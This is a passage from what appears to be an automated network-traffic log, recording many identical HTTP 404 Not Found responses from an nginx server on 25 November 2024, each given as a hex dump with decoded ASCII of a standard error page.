      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:10:58 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:10:59 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:10:59 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:00 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:00 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-Encoding
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:02 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:02 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:04 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:04 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:05 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:05 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:06 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:06 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 